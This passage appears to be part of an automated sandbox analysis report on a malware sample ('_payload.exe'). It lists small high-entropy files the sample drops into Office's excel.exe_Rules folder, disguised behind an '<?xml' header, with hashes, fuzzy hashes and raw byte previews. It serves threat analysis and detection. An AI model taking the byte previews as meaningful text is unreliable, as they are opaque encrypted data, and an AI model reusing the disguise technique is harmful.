                                                                                                                          Preview:<?xmly..`s...0{D<..Z.0.......ss.E.....mf.2..8..._.?.4y.z.9.n.L.E:..k..}...f..zqW].d.....W<.xH0'#.9.`...Z..n...c7*../...,.J..x.f..$..........B.N..oHH..0ZP.N.*.`.y....a..V&zA.Mq.@..hIE.)...I.6.....bO...T....K.V".Z..f"1...&.SJ....].....3....L.LO.Gj..6fv...t...........c...g...D:&.;.AZ.Y8.....H....zu}.@...F..b..k-&.1.!..(....,.'~.H..D...0.z36.F......E_k... .V}....-?%.2{Uw...u....z...$zi`2...w...q....5,a.Nv.D......[i...y.7..B5....7sph...SZ...)<t&|F..dG..m..s.s.....S.m..Uw.;....I.....;......x.@..`...G...73.X:..;o..%..qhE.........g8.AY4....zj...f.t.....m.K...g..Z.....&..rc.X.E......N...........V.ivoi.kFgyu...UV.^qy!.G+!..w.j.Qy....f.X..~p.Q=.E1.../.z...$..)..-'.0.KE.Vt..*B.,_..e..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120643v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):733
                                                                                                                          Entropy (8bit):7.661255028119832
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:s/USh8ivGixU8zQmPKkrN5tbFMdWZVhrc+ByhNgUM9aoOGq26QQNh/QWErq5bTcq:pe8MGixU8z5ykrX5FLZTQNvgUq+GT655
                                                                                                                          MD5:50EF7D3CEA3F6BE433691FF824AE878B
                                                                                                                          SHA1:D28BC557945AB5771BCDF7E103FB182AD8E0F054
                                                                                                                          SHA-256:8B6553C1DD9BF24DD9FF0AB06088030322B2941BE7072A88882D729B3C9BEC3B
                                                                                                                          SHA-512:7E6635192331A947F33D4BFB4C3533BF9D9C7507C846592FCB9080731D86BA7EC65CC5A2AFAE86F6252FA18D2ECA74B31BE65A73DF9A02B19D61EBC8867AD6D9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.gD...._..*0....B@..T|k.....U...j..[.E.....J.+.'....L.I]P0...O..*.....d.......k....lK<s.?.P.b...o..4u.7G.:.h.f.......d.5..a.....%....G........#Bo&'%9E..+..dE..H..Z[o...T.{.B..*`[......'a....+A.R....j8.....\j.".o,.................jH4..........(c...D.....k....$O...O$..".j...xY.p..'.x~.G......M...-....!...G...e.....c+.. l}..a.....8.O.%u7.......y.u.+Ll.j.w...g.......j.DRq...^?..wU.d..IN.i...$).......;......)[.....S+.Z......N...O...'.h..<.|At~Z-...;..y :..Y......0#&.Nd.............>.....B.Z......E.x..{s.Y.>..;..WO....S......(s...(.i.o.g...5....N.*!..?.......6.B.E.....Q2.Cp.C.{....a.f1^.^P......Z/...._.....Y....a.!...7.Z..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120644v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):812
                                                                                                                          Entropy (8bit):7.72241676688707
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:uYjOZF6sOgOZ+ykV6jJsnL8B2uoMauDw83ZzHCYjf4RoY2oK0QDR2zWRUxqtzq53:IF+2OCL8voMauDvrCxB0t0WVtGbD
                                                                                                                          MD5:607C0CF1A365D43D439D4209D0E5F6EF
                                                                                                                          SHA1:C837BB37978EAE118BD3BBF23A1CD1E868B384BB
                                                                                                                          SHA-256:73E7AE169F8724DDAA98CEEAC4FE0E1B793C986A422F908C430DFFFEF94FC673
                                                                                                                          SHA-512:F1451CC560C3B0BC2DA6883DD9FE122896687A604C494A42E302ADBF03B888A34C7E055BF78A1260ABF9512B75C7DAD735246B758C698BDC800E54BA1D5CDD46
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml".....+.o..y...@X.~.U.K....$...K!.s9..G...&vDr}y...c...}.{`...H.d..q...4...Df.]...:.....|"X....v;A.z....).%.{VD.2.l. ;..iR.aH.")...(.S.+).S .Z........q.SGF.wu..8uu.c.6HY..,=_...lC27....H..8.P.....<`.3...Q...c.4...#E.Wp.......~.....J..rb....J^..v+X...6=..%vUedW~../.x..M..hYQ..sg..F.Cd7S...@.Z..1..@.\}.M...zd.G...8'....R8E~).mo...X.i....Y....5.J.>H...[E..V..uv..b.x..1@i%r..kqC........xJ..zn...&S@.4...X..4.^.l..~..#..L....;.W..V.....g.}.m..P1...yR.PO.......x0ZsD3.B.......r..\.C..6...N......C.......tp.L/\.....J..2C.R.m.......B.yy.no.z3pf..#.1.p.P.:..M.] QP.]....N.x.)..`......0B..q.AUtW%...../Y..5_j.0+.^p...s..].s]3s.hN...\.....x/..1Oi.f.|.(.s.....G.1X........3P...#f.Gw-!1.N..@......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120645v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):758
                                                                                                                          Entropy (8bit):7.724408911779511
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:N1PSr2tgxfO4o0ZK2v4l75ZN9QlzSXR5SF8FOVuzGq5bTcii9a:N1PBlV0D4/r9Q0DSUau3bD
                                                                                                                          MD5:3FE02834D4D921F15E9CB70C439A013B
                                                                                                                          SHA1:0B4BFD578B09F889D15CEA205BAB9B2C6A35A88C
                                                                                                                          SHA-256:F8B148B810DD722C421DCDC3A2786588E190C8472B15B3EEA8522719B94F83A7
                                                                                                                          SHA-512:22B1E3F7A1FB28365E912E4E0C48B5E7AF83D626D54E1E85B0B79F132C7E4DF63F486F4D829FFDD9C7B43D773B29E0958982AC9F001C5E6E9E52553B5D8AA983
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlj3d:.Q+...?p..i.Z.u...|..S....o.....M.....c..Z.H.W.i.P..X...I.(.....]H.).:%3..V6]._....E..k.....S...S......?.8..;.3.. <..!.V?...3.M....(...=e.4L.[..........cH.@...].%.&....{t...:.2..Z.......[>.....o.^ .H.9.^E..f.c.<n&.....Nd..v^S.....M%..Hu.....8.vK.....zXD.E..U.]1jV.jjN>k5j.........n6.....C..<#Glm3..m.d.q...UaX.|[1..9-.a.|...L..q..m....JX$].8P.`....*.4/......C....fh.l..`. .s....EuhQ.w.....*..D...%B9O(d..{.n...........W.P^.:..]q...V.u.u.q.U...P...^{..zo...r..R{f.......Q.[.a0.e.4.......1...\..bO.....&.h....T~'..)..5...^M!...d.M%..=.u.&A..#"..g.l.b.q./.`fh.....v.ZG....(...U...q.<.!...2...8...)..&G....~'I.~...V.......~..|.G...4..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120646v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):808
                                                                                                                          Entropy (8bit):7.712621252065464
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:RZUkacp1YPj9AlySLQO4vYcGAho9iHuv+NNbD:DacwalyQ8MAhLHXtD
                                                                                                                          MD5:B62AC24B4C88B642870435BB3F9E62E0
                                                                                                                          SHA1:2E579E14FF30D8E19C818DE530459CF267C173BD
                                                                                                                          SHA-256:973FC7DFA184F31471D740A7492AB4197C28124E6E5D173D7946CDBE84772932
                                                                                                                          SHA-512:ED395477C5CECF2AFA46A9E46D9ADD1A5B3C520A8DC7219E25B0760C3A42B6C3972EBB5B10FE1B6AB0F4B129F519A2170C2CC774414B0D4482DC90C9DA9A1900
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......My.K._....T.8(......d..@..l rT..HE..u?...P....g#oK....z./......6.g.4...T.D..x._;.....1.2.N.....1..6.//..o.x....h1......T.0....I.0..0...aG..iM8.!..'.i..C.....?....-@q....?wt.......|2..=.&.G.#..1..;c....p..<.Q..Az.q........Ls..P...yx.1WQ.......q...d..\i2..F..R90o..x.....uq..@...0..-?.^..E!c..A..}.[>`\/".L....8..<..vu...0A..I<)Y...._H6.7A*.Z.W\u.+...4.D..y.....YR.#.4RY..F5......).|.i"N)T@......m.f...0.qO.@3..qn.F!.)Q[..D...w...,Z.>Lf...^,.1!..?..|....i......y..6}..........fT....\.^..@.......Ss..e...F%...F.N..{w..p..._....;.L...'V.._.........y...|.D.r~.....Q~...h.u...Q.h...E..i .........1.....D....s..6....b......za....<...yt.6..mz..Tw>..0*@.aT~s...W..m..3.H.....q.!..j..H...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120647v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):781
                                                                                                                          Entropy (8bit):7.750401344072234
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:eOXEupgYaqCqUa1APH7PMvTP+eozu5+eM/8l/PVDFTR5JBVOEZH8DqLq5bTcii9a:8nYiqkID/ozfTkl/TR5JzOwH8DTbD
                                                                                                                          MD5:3C8DDF38FD181A9299944DACC61EA3FD
                                                                                                                          SHA1:E8A1B44F6638186521CA664219FF21CAFA2B66FD
                                                                                                                          SHA-256:D812D1F715F3C50ACA7023AF6A48D0DA518CCD416C7B93F8993D646F62C63AD2
                                                                                                                          SHA-512:1CA6ADB6C337F0B2D842047D05134BCB8C78607A339BADCD2E0A4E7841A543176292C3DBC58B7396EFFEDA12B88437A439CCAA8C89B2091DD60E35BAE938AF5F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..|?.B......j>..+#.........y.....2..!..y[...9S........`-.Z/..n..._..?R...`.{)....[..5.k...B..!.W...#.."A.2.,..>M6.0..t...?.<.-..t...Z,..)...3.s>.p...%h...ot9...<.....t.y..S....O.../G.j....:..1..h..I...c-...;.yuIh2.F0.....r..12T'x....'.0...,...!.`....q.....*M/...I.~..;.6ck.t.u.2T._..M./.8....6l...:@....K.....B.Q(.;2aj.].._*])..0t...~j..m....u...P.gN.z....!.0A..XC.)...C...\.].....O.@..KF.<.z.....].p.;...>....!'...4Qg.i...).. #..q.se*T...RC..fB2...b{qVhU.l.`.r|=.$..}....Oc.]......(......c..+{..._3{8......../.yz.......$.7.*Y........U5.d'.2c..L<.....(Y2c.q.Y.....F}.a.u.;.....2.0."pj+p."...S-7.....=C<v......+.[|.......1tRJ.^....)e... ......b..&Ud0 ....S..;!!.^..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120648v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):824
                                                                                                                          Entropy (8bit):7.715337418041368
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:G3FyWfrVbEWgtOuMtiMk0cTJYVQYtt7bD:GQEjgtDMEMkhYVQO/D
                                                                                                                          MD5:A65CDC3E1DA610DB569A116490976945
                                                                                                                          SHA1:799644FA61B8E049B082345AE4FDB781E270F804
                                                                                                                          SHA-256:BF84901DF58F9F6182703F84E4CB28D15B2AC819010E7305A6E7FA8BD004033C
                                                                                                                          SHA-512:57D030C95ADFB35B9AAE3A5135C17A40753F68E11123B6AB66A5407758403436C69882218D89ADEEDB5D006F4421D7B90412A0A0131D9FD290914FB28E50271A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.m.k..&$..R.O......u.G..Y64.)..dy....3..^|No.+O4Hn(.....;.....n..J0.U:..z.q.. k.c......C6.RX%.}...n......{..d.O...>...T..}..!.891.......j0..|...m.......E......pi..K-.5.....&.=..+..u..r^w....R?M..uQ...v..z...T...[l.B..^!.y..8......8...\.....A.D...L[8.....:.[f.....UH4A.c.....W...5......>........|8rF....u[T..W+d<..n....6-yk......8]n.....I.....r.o.3{.{_.;..r.k..,....,={..Hu.r. Q.z.A.$:.....Q..# Q=....|N.."..W.U....$<1z..G\.<.?.:}.U..C...W..%~+p|I.....i.#.Q..>.og...".....at.m......i.?.y...M.T......8.....RCLQ../..=e.*..S}?.(.Y.;..|.#rs.<g......Hg....O...B..y.?c..e.JN{#..SQ#...Q.w.....v...XR........"..b.:.....\w.#....ah%.B)W..S...|>..W..1...Q....U.;....3........nt...l...#\...!mP...<..Y>&Ne....I......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120649v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):749
                                                                                                                          Entropy (8bit):7.6920126445599015
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:R+xBdujeMKU+YRtN94ynahsB1AJfbCOVrbhhvT4Lgjrx+1nXCvIkjvGFq5bTciik:AxBdujMUdRV4yaWsTVJhv8LArx+NXKTL
                                                                                                                          MD5:EFF8A497448045B38B73BC3DE52D323E
                                                                                                                          SHA1:A7EA2B7A29A97952EDF853DFFB80EEA6E1AFEC0D
                                                                                                                          SHA-256:1DE15193E71DAC1123504AEA547B42414B4D13BDF5278A12F47BD74C7F92F1C8
                                                                                                                          SHA-512:85C8C9794095CEA85F5B52A2E3F5D97A1BA14429928FA29F31E8A640E8C37A3D29C389B7D8B5B222F0D8714EB0AA4AA74C78CA272120AF48060A7EE11B6A6E8D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml~r.P.&U"....Fn...Q...!.<$.tCy..A...$.,DWBX..}.Ob...._.T.\.g.`.Q.1....5./5g..=...KR.....lH....2y..ug.U7..,..J AF.K.j].6.....%`Y........R...#|M............h|J.h..#6.....1:Q.5EG...H. ..jCy..;.J..GZa.n..8...n:.(J.4....O.v..6.lN.o{..W.3.LLG.....+!...KAP..sP..Y.yN.<....oI.#.%...v....(.....mH..P2.ji....K...d..y....DE4.=&V]Q.{..Y..+.BB..Y....>9.Y....%.D....e.........e.-.a*..j/....}}bl...j/q.fep.!.j:......<.#..?.AH.A...w@2..(....i.g6jhY5'...M7uy...eq..w/.=...<.k......B....K......0^..#.%<".-...wN,H.I.uVG..1.<Hk.......Z...{....p>g.#5.7...`.?..'G.1.tJ........f...=m...../kF....7..0|g..../.3..D....4....P.....J@.@}...Q{_N..W...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120650v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):812
                                                                                                                          Entropy (8bit):7.732117360316156
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:UuNBb4XiQYb7Ab1PTSe016PzgHmncUairmGWTI28VBCw9CUeSWOTlp5aMd97q5bj:UuLjgTSeiFGncUaBiXCUeVOTt0bD
                                                                                                                          MD5:C35B354F474E949B5B9D0F3BC0356536
                                                                                                                          SHA1:113C6AFE75AF040346ED45A31B24A0F7D7CE7B83
                                                                                                                          SHA-256:C2D8A1A67E4E57145D8496DB5B0543571429D662277CE764235A1D300A58C493
                                                                                                                          SHA-512:A97AE1583580C8C8448EB74D6CC96FC3F5B9242D6DDF4C86A8604B0E76A3FCDB1FD7030D2DFA4AA4894AC3782CFD3B8765B6420C7CCC0F39527C8E5DCBEE7DB5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlj'....$/.N....^.......GQ..........XL.....P>.Pp........&FRC.F.oq......CM..},..%...;......NC..^.^.4.9.E..(....~\.p.....qKy.&..wy.:.:...~Fhbdw.o.s.E....r46...L...:P......'n....V"......U.m...d'...1..H&L.2..<......I}....u....?..j..V.$M...r8.....&1....?..i>...N1.4..d..T.k.).H..'..c.D....X?.4../...g JT..#xU.~H.y.&..9.(X....k...o......=^^dD...W.q=..].BS.0n.Y.9...]!'.j.I.(...n......Z.8.W....ZvO.e.ZZ....&.9..w..-.-.....?.H.[....U...;...I2.{J;.H.........1...j\2Q.i...3...nLXi._..F..@.&.p9k.x.*l..+...z...n(....r!`.L.R.B._A./.8@..L..Y.....$w..l....c.2HoF..iQ4..%.w....N.Hbh....-].....\.......Y..#..y_..^.......$.ahw..Y)..C$6kt..D....... \.K..N.5Z:.\6aMw...zv.Yf...&q#.h..;K+z}..F0..Z@V9+?.tl...aLc....f....}fUphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120651v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):748
                                                                                                                          Entropy (8bit):7.685401342304158
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:qu1MCSyY3LHm8TCIPVXurHfzWD5TZIIAtH8tnsai3X+AeLue7biubJ079Y5crhqt:zALOQ+TUZlWsLmX+AeqspbJ0797wbD
                                                                                                                          MD5:A429731FD86404F2F93D3C0629241012
                                                                                                                          SHA1:D2E0ED9203B8728DDF4A56E52BF2A7E83974A8AA
                                                                                                                          SHA-256:972C2EE3A95A92A278A962A58D5DB65B0F84D27B8E828CA97BB7A089F8021E44
                                                                                                                          SHA-512:AB29400BD4E05EE74FD19D6BD4E9505887F393D24E45D9ABD38219D4FDA6561B70DF95997A1A5B82D2F50CF5F4F6A24293614832324CEAA15F7A8E688FDCD90F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlj./.ns..-]s......b....^...\..gD.[&.....g. .Q\e.........!8D..r.U....j`V.....u.^..^Ub...!.c.....b.......u0.<...!..]h7F.C/K....t...(Oz#.T ...1.N.;Gs+...4...x..f..2...!.y.=o9.7)....&../m.N`.5#.w................3d.xC5."...vH,p.G..N......<?.[......=Uu.v...._..ow...|.....b.}.....\..Z._kmhp.`@.1....SG.^j... @.&E.o..-<...&bK.....C..ATO.W|k...C...a.q..X.(......v.MZAp.!.L7t.E.[dL,......^7....`.R...t...yJ8..[...@.....#V..@......0.E.;.c.S..2bYN.^MG..E......Z..2h5..d....;a..)....L...f.Y5E9 37a....L.,..i..7.#.O.x*..o5.....,j..-8.vR..u.....mG..lbm....u..G..Q.x......&[Q..g^A.f.......e..u^V.$.8^(.$......Q...~.....".W.*...)9>c...6..EoFr]w.PT.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120652v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):804
                                                                                                                          Entropy (8bit):7.760971033652263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:24GsLxuK85o5qPpbc1JHuNfH4fD7CsnFoT6bD:24LLxuKiVPpIQPkHqT4D
                                                                                                                          MD5:90B7C640B5F3BAA1A5038F1A7F2DEBF9
                                                                                                                          SHA1:3BC02B12496775165BEC3B121F4E66802F239AB3
                                                                                                                          SHA-256:1E9829B64B031E3137531348C97F50861DB37E55AA49243B25F3C9DC4D9BC80C
                                                                                                                          SHA-512:A2100F4B71BB6D529E32D1BA6D7AB4CB2D0AA10D95563247AF3500E0CCB0D9D538964F1FB9FC2603A7384818922068ADF87E62E2F089FC1769511FE829D59B7E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml........:...PY..{.....v.../eA........p.'.....S..!.~.........4B..j.z..Q`=....h%...]:........7..t,..<y.,.....>....}8...W.....V.=...~..Q.'8.6.....d*^...>..W..m...,q.X\.~{.{.}}.r..B......7...F.]...~.6..>#..g-......9z..Z(E].D....[............5........x......N.c.....s.#d...bx....o(k3.~*8E x.......wb..z.A.A..yO....CGFn....0..C......,...5KU..d.Ul...r.b... ...U....(.V=...gm.sAA..4.............+...>.S(Q..M%o".....o.^...iiwU+..V.r..T.\......[..:.C..q...rF.......N........z...f....3.m...s......dH.......P.....Wh...U.@.r...E%bg8L`&..j...O.^.t..;.}^.......F..8iT.v.......d...l..%.Vk.`a....j......./8..V...m22....%....91C)....2..i.....g..10.u$....A.D.."..{...._._.3......S...)...s.}t.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120653v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.7305227251272735
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:48HX/P2O5basQhl8uwSkhaMqU/iR3IqvLkstlhk9s/5ZZ49aZYPzi1VdjW0vWrqt:4W/P2Ab88jSknqJRRvgstlSQ5HiamPGL
                                                                                                                          MD5:E60DDDA046C089EF7C1F8979982991D7
                                                                                                                          SHA1:B16E5A781224BDAB20F63D00E6B064411F463740
                                                                                                                          SHA-256:18524A7C07916A3E78743572918D0B1EFD39A5D283AB68118EA36754E01D3B23
                                                                                                                          SHA-512:A1687A5C9F3E29EE2E659FD35340C6229C5BF8C6D0E5C100F5D2826EC84EA2A03D419C3039CC4441E8CCA72A407C73A54FF29E7FDAEBCA1DA44FA5D2603D2590
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.^...H^^jh.T<pWR.r..CD..z...*8...`C.Z.W'..3B.....Z.0......7....."...........jT.X!*....nv..^.yuH..q;.T..(..}.~...?!.vn.(.)~.2wz76U.c.....>3.t.....cp9M.P...02g.u..d=...B.....&&{.....z...j=+........L...[L.....B..10........CN....1H.._....S........^69T.GI{.H.6-.>..Y..L..Y@..q..u..8.B..g....^..".p.xO...X"...........dW...$.b...3.``{.=Qj.h........B..n..B..0.|4...d e.Zq|.y.k..W8......G3.I....../+....6.2.y.....`n.c..N..i.V...8....+.R#k[%...J.f.j.].b..4.i...o0.U.2....v....u0...Xr...\..;.....(.B...L.cL..K......../....b....T..}#...u.g..t.0V....H...1^...La........0.....F.=.U.Z....N.........*a.O.JiM.....](..b...+....m^.Oo....\....3..@.w.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120654v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):810
                                                                                                                          Entropy (8bit):7.697390760747503
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tksmWjX+zmFJ84WnmpXcOc4mDc3ZFXmLHbD:tBVXCmwZnmpXcX4mDc3fWXD
                                                                                                                          MD5:753AA8F200A3F8CAFB24EA8E8D2AB77F
                                                                                                                          SHA1:0D67C0EE9CB66B9619CD55DC650FAE5467A0775A
                                                                                                                          SHA-256:F67F15C6A3CBA7EC5427372F05CBA37001155E930C72FB063E4EE8513F19EF43
                                                                                                                          SHA-512:E2E67CD663926A2ED578B9E40A7EF7AD132D4746EDCA5F0F3215855044D59A2CD57F60642E4AFBC0F723BA8DFFA3BE0088CB9EE502429F0EEBBAF668F392129E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....@U<.U./.H+..h,....}.TI..=...w.#..@....6e)'.w...!....C..w_..ale....p.........3.i.WRMZ.T..;PsRqy}J.-.k-..@7V...@..&......[...w5.eY..8.G. .....^..M..%&.)..P...........,.[..>....^.l=.hp.E...........B......C..y..) uZ[2D.'....1....arJ..,|d7'.........[...b...-..T..*UO.....lkq..7...5.J...?o..|...^....Z,,A,..0*..P3...R7h..k.Ka..D<h:.#..3..y.UM...p.?)xN..%m5..=}q..Rnd.>..........%.2....F,.9+.|..N.$.....Z.d2.].;..p...../;..g7....@ziy1..w.Q.....,....m.........'.1.....!.....2...WR.....y.>`!.*.Ze..A.n..|.F......J!.."...v..j{/P...~.,....&a.~..~..zr..5b....5.k.ar...i.....2[.v.s...ng{.9.|.....d[...c7..G.......B=..T)..)t.'rm....g..@o.)C.\.S....v[...=5..i..iR.)...Z...5F>..o.m"k.4'.b....A,7/..!.N<.$.9.[.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120655v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.710984986045359
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6cH+XkiMnvD5TlhkUGmE2tpOJWGpRTSXys4lICKMGP8Qz/J7ejy+q5bTcii9a:6cH+XAlTlhkrYC+Xys49w5zxKEbD
                                                                                                                          MD5:41FD9A6E3EA633C4A575C0DF331260E5
                                                                                                                          SHA1:FBFBAEAB1D0B87DA2F0DFF4DCF0C0CA0226FC1D3
                                                                                                                          SHA-256:0824AC87CA218ED6EC8613A6FC690A45B3427F1C0961C492BD9A8D809EBB7F9D
                                                                                                                          SHA-512:55406B46A1807891180BEAE001326BED69BDD90884C6F19708A30DF310F59912243E68A464039C877064D84C03F59A217FAF5C27B7CE0B0371D79CFFA7AD39E4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml........9.5[4k.h.vV.[.#H.Y.f.5..Nf........f...*.A.H.../(0.?......XT{N}......\...K>...*.;.2.#%I.ow.....*4..ZR....7}...<..M:.Y8...%.&.b...'.{J...B...o...#..R..@.~.d:Y.&ml+. .@.+....*^...]s3q......^.....f?.:.c/.$..8.2.K......B.....|..P.]v.....uO.z...M..P...la.|.|,..#r......>....%.......0..k..pc.z[.b.Ix....MI...i.%..0-.,.......I..sj.ax..?.D.~.O.#`.....=..uE..l...|{'..6..+4k....:/...9e.{1.=.......M.$W...:C. .y}.m.j.4.p..\n.^.Q...._).c.A.K.v...A......6.g.'6.v.1.#..71.J..4J.S@.\B..!.U. .b;..=......U.......c.....=Y$.g..K2J....B...l.K2C.....9.]4A...nq9.UA.m.H.4&..?."ZD.I&b.d...;.......4...7,`_..Q....o2..2../.e..,..Ij.2I............F.:...4phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120656v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):810
